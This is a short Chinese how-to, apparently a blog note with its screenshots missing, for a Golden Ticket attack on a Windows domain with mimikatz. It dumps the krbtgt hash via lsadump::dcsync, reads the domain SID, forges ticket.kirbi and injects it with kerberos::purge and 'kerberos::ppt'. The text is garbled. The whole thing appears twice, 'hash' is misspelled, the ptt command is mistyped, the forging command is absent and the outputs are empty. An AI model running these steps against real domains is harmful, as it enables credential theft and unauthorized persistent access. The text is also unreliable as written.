一、使用mimikatz获取信息
1、获取krbtgt的hush值
使用lsadump::dcsync /user:krbtgt
获取到
2、获取域sid值
使用whoami /all
获取到
3、获取域名
在系统中查找到
二、制作票据
使用第一步获取的信息进行票据制作
制作成功
生成 ticket.kirbi文件
三、导入票据
1、使用kerberos::purge
清空已有票据2、kerberos::ppt
ticket.kirbi 导入票据
导入成功
一、使用mimikatz获取信息
1、获取krbtgt的hush值
使用lsadump::dcsync /user:krbtgt
获取到
2、获取域sid值
使用whoami /all
获取到
3、获取域名
在系统中查找到
二、制作票据
使用第一步获取的信息进行票据制作
制作成功
生成 ticket.kirbi文件
三、导入票据
1、使用kerberos::purge
清空已有票据2、kerberos::ppt
ticket.kirbi 导入票据
导入成功